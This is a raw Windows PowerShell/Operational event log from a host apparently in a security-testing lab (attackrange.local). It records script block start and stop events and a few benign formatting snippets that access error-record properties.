LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477782
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477781
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477780
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477779
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477778
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477777
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477776
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477775
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477774
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477773
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Path:
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477772
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477771
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477770
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Path:
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477769
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477768
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477767
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477766
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477765
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477764
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477763
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Path:
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477762
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477761
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477760
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477759
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477758
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477757
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477756
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477755
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477754
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477753
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477752
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477751
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477750
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477749
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477748
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477747
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477746
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477745
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477744
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477743
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477742
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477741
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477740
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477739
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477738
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477737
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477736
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477735
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477734
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477733
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477732
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477731
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477730
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477729
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477728
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
